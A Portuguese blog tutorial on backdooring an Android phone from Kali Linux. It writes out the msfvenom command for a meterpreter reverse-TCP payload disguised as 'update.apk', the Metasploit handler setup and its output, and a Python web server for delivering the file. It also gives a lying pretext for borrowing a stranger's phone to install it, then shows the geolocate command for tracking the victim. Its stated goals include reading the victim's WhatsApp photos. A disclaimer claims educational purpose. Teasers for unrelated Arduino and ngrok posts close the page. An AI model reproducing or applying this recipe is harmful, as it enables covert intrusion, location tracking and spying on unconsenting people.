Pular para o conteúdo principal

Hackeando android com kali usando msfvenom

Olá humanos resolvi voltar brincar kali esses dias, ver algo legal com o android, fiquei pensando que poderia testar algumas coisas no android com kali, tipo pegar geolocalização e saber onde a pessoa tá, saber das fotos de zapzap da vida coisas assim, pser cheguei nesse nivel de brincar.
/ AVISO ANTES DE CONTINUAR ESTE TUTORIAL, É PARA FINS DIDATICOS E EDUCATIVOS ! OS USO DESDA INFORMAÇÃO PARA FINS DISTINTOS DOS QUAIS CITADOS A CIMA DEVE SER DE TOTAL RESPONSABILIDADE DO LEITOR. PS: Não nos responsabilizamos pelos males cometidos por terceiros. CONTUDO, BOM ESTUDO CARO LEITOR !.

Neste lab vamos usar:

1 - notebook (com kali linux)
1 - celular android(meu é um galaxy s4) // sim bem velho rsrsrsr
1 - tempo uns (20 minutos) // rsrsrsr

Bah guris e gurias, primeiro passo é estar conectado na mesma rede pois vamos usar um ataque chamado MITM, para saber mais clique em cima de MITM. Em resulmo esse ataque pode ser feito usando uma rede local, porem não é muito dificil fazer usando a rede WAN.

Antes de qualquer coisas por ordem, criei uma rede de pasta dessa forma.

root@leaozinho:~/.pentest# ls virus/
android  windows
root@leaozinho:~/.pentest# ls virus/android/
update.apk
root@leaozinho:~/.pentest#






Bom agora precisamos rodar o comando


root@leaozinho:~/.pentest/virus/android# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.15 lport=6666 R > update.apk
 
Bom agora devemos ter um arquivo chamado update.apk, temos nosso backdoor tZ guri auahuahauhauahuh, agora vanos deixar em uma aba no terminal do msfconsole vamos rodar

your progress and findings -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.40-dev                         ]
+ -- --=[ 1596 exploits - 912 auxiliary - 274 post        ]
+ -- --=[ 458 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.15
lhost => 192.168.0.15
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.15:6666
[*] Starting the payload handler...

+ Nesse momento vamos abrir outra aba de terminal para criar um server python para pegar esse arquivo nessa pasta /.pentest/virus/android/update.apk , nada muito complexo basta abrir um comando na pasta e rodar o seguinte comando.

root@leaozinho:~/.pentest/virus/android# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...


Com isso abra seu navegador na tela do seu celular conectado na rede e acesso o link, no meu caso o ip é o 192.168.0.15, como o server http python roda na porta 8000, basta digitar no navegador.



EX: http://192.168.0.15:800



basta abrir esse link e fazer o download do arquivo apk para dentro de algum celular na rede. Segue o exemplo da engenharia social da rede rsrsrr

"Tio me empresta seu celular perdi o meu é estou sem a chave de casa, me empresta o seu ?" - dica quando estiver com o celular em mãos, ative gps so por zuoas mesmo auhauhauhauh

Bum  !!!! vc baixa e xazam !!!! veja !!!

quando voltar pra tela do msfconsole veja que ela vai estar mais ou menos assim



Vai abrir uma tela de session no meterpreter auhauahuah xazammm !!!! vc ta dentro !!!

Para ter acesso as coordenadas do GPS, basta digitar geolocate

meterpreter > geolocate
[*] Current Location:
    Latitude: 0.00000000
    Longitude: 0.0000000

To get the address: https://maps.googleapis.com/maps/api/geocode/json?latlng=0.0000000,0.00000000&sensor=true


Bom para ter mais informações basta digitar help é ler a documentação dele, espero que tenha gostado >/////< bjks e até a proxima...
/ AVISO ANTES DE CONTINUAR ESTE TUTORIAL, É PARA FINS DIDATICOS E EDUCATIVOS ! OS USO DESDA INFORMAÇÃO PARA FINS DISTINTOS DOS QUAIS CITADOS A CIMA DEVE SER DE TOTAL RESPONSABILIDADE DO LEITOR. PS: Não nos responsabilizamos pelos males cometidos por terceiros. CONTUDO, BOM ESTUDO CARO LEITOR !.

Comentários

Postagens mais visitadas deste blog

Automatizando uma lampada com Bluetooth (Serie: Sem Fio)

Olá humanos, essa semana estive com uns guris da minha faculdade com muita dificuldade de trabalhar com o modulo bluetooth HC-06/05, tivemos uma apresentação dos projetos da minha turma e apresentei um robo explorador controlado via web, porem o que me motivou a escrever este post, foi o fato de uma equipe ter empacado, no quesito usar o modulo bluetooth durante a apresentação dessa equipe, eles falavam muito sobre como não conseguiram programar o bluetooth e nem a eletronica funcionava da forma como queriam, quando terminaram de apresentar fui até eles e disse que ajudaria eles, por que de fato é bem simples, então ajudei eles, em um simples test de ligar é desligar um led, controlado via bluetooth. Bom chega de papo, vamos ao que importa, o que é um bluetooth ? bluetooth e uma tecnologia de comunicação a curta distancia para transações simples, sendo envio de mensagens, ou envio de arquivos. Para este projeto você precisa dos seguintes ingredientes. Arduino UNO Modulo Blueto...

Redirecionamento de Porta usando ngrok (Port Forward with ngrok) SSH

Olá Humanos, estou no pensionato e aqui não tenho acesso ao roteador para fazer um redirencionamento de porta digno affs ¬__¬, sim pensei em Hackear rsrsrs, porem minha preguiça minha preguiça não deixa hauhauha, então encontrei uma ferramenta bem legal chamada ngrok que faz com que eu possa acessar remotamente meu servidor local para brincar com IoT. Instalação e ngrok  link: https://ngrok.com/ Para se cadastrar é bem simples basta logar com conta sua conta do git ou google depois faça download e na https://dashboard.ngrok.com/auth na aba auth pegue seu authtoken e valide no terminal # unzip ngrok-stable-linux-amd64.zip # ./ngrok authtoken <YOUR AUTHTOKEN> Instalando SSH no seu computador  Bom se você usa Ubuntu basta rodar  comando  # apt-get install openssh-server Para testar se o serviço digite  # service ssh status Iniciando SSH no Ngrok Rode o ngrok em protocolo tcp na porta 22  # ./ngrok tcp 22 ...

Scratch for Arduino Servo Motor Basic One(Controland Servo Motor com S4A)

Olá Humanos, aqui vamos brincar com arduino usando Scratch, neste pequeno teste vamos trabalhar com: /* 1 Arduino Uno */   /*  1 Micro Servo */ >>> print "Com este Circuito bem basico " >>> print  "Com o circuito montado inicie o Scratch for arduino e Programe o controle e movimentos dessa forma. " >>> exit()